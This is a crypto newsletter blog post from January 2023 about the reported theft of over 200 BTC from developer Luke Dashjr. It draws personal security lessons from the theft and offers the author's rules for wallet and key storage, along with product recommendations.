2nd January 2023 > > Security.
Updated: Jan 12, 2023
tl;dr
A sobering story to start 2023. Take note and take action if required.
Market Snap
Market Wrap
That’s a mighty move in perpetual futures funding rates overnight, for reasons that escape. Bears must heed the possibility of a short squeeze and forced liquidations.
Curious Cryptos’ Commentary — Make security paramount in 2023
A sobering story to start the year which I hope will encourage everyone to think harder and act smarter when it comes to the security of your crypto stash.
Luke Dashjr is a bitcoin core developer who has been working on BTC code for several years. He clearly knows a thing or two about BTC and must surely be well-versed in the use and storage of private keys.
Or one would think so.
He has claimed that on December 31st, 2022, he had over 200 BTC stolen from cold storage, currently worth over $3.3mm. That is a bad ending for him to what has been a bad year for cryptos.
Though details remain sketchy, my understanding from various Twitter discussions (Luke is famous in the BTC world so his loss has garnered a great deal of attention), goes something like this.
A month ago Luke downloaded some code from github.io or wherever but did not PGP (Pretty Good Privacy) verify that code. PGP is a public key/private key encryption tool, a concept familiar to all crypto enthusiasts. It is often used to send encrypted emails that even if intercepted cannot be read by a third party, a highly useful and desirable outcome for dissidents or opponents of oppressive dictatorial regimes including such luminaries as Russia and China.
For BTC, a message transferring coins from one wallet to another is encrypted by the sending wallet’s private key. The validity of that message is proved by using the wallet address (i.e. the wallet’s public key) to decrypt the message.
For PGP a sender of an email will use the recipient’s public key to encrypt the contents of that email. Only the owner of the private key can decrypt the message, the opposite process to that used in cryptos.
In a similar vein, the validity of open source code can be proved using PGP.
Long story short, Luke downloaded some code which had been maliciously changed to compromise his PGP private keys, an irony which should not be lost on anyone.
At some point between downloading that malicious code and two days ago, Luke used PGP to encrypt his crypto private keys. Anyone with access to his PGP private keys then had immediate access to his crypto private keys, with the entirely predictable outcome that his BTC has been stolen, presumably soon to end up in a mixer.
…
There are several lessons we can learn from this sad story.
Lesson number one – use PGP verification whenever downloading open source code, which is an oft-used conduit for malware.
Lesson number two – do not store crypto private keys online as this makes them vulnerable to hacking and phishing attacks (note that tangentially this is one of the key reasons why we recommend Ledger Nano over Trezor).
Lesson number three – depending on the size of your crypto stash, you should consider extending the number of unique hardware wallets under your control.
…
Which is all fine in theory, but how to put this into practice? Below I list our golden rules. I urge you to compare your security arrangements with these and make good any deficiencies you might spot. Please feel free to contact me with any specific questions, or indeed tailored advice.
1. Never store more than 5-10% of your crypto stash on a centralised cryptocurrency exchange, and then preferably only Coinbase or Binance.
2. Store 5-10% of your crypto stash in an online hot wallet, preferably MetaMask, for trading purposes (if that’s your thing) and interaction with DeFi (decentralised finance).
3. Store everything else supported by Ledger using a Ledger Nano probably accessed using MetaMask.
4. For coins not supported by Ledger consider whether the native wallet is more secure or not compared to leaving those coins as part of your centralised cryptocurrency exchange allocation.
5. Use a metal plate to store your private keys and keep it well hidden. Better still, use two metal plates, split your private key into two parts, and store both metal plates in two very different places.
6. Have at least one back-up Ledger Nano stored securely elsewhere.
7. Consider your options with regards as to how to ensure your crypto assets are passed on in the unfortunate situation of your untimely demise, which at a minimum requires extensive documentation of all exchanges, wallets, and coins in your portfolio, accessible by your loved one.
Specific steps related to these golden rules can be found in our free online training course:
As for which Ledger Nano, I am personally a big fan of the X due to its much greater memory storage (allowing use of many apps rather than deleting and reinstalling on a regular basis) and its Bluetooth connectivity to my iPad. I know some are concerned by the latter. If that is you, then stick with the S.
Next year will see the launch of Ledger Stax specifically designed for interaction with Web3. Stax also solves the problem of needing multiple hardware wallets for those with significant crypto assets. I look forward to reviewing it for readers of the CCC.
Recent Posts
See Alltl;dr UK politics are in a flux. US politics is doing what it said it would do. A message for all scammers out there. Brian Armstrong...
tl;dr $100k. What else is there to say? Market Snap Market Wrap You remember I was forceful in my belief that that the $97.5k to $99.5k...
tl;dr The new SEC Chair has been chosen. LINK proves the value of the EU’s crypto regulatory regime, an issue that the new SEC Chair must...
Comments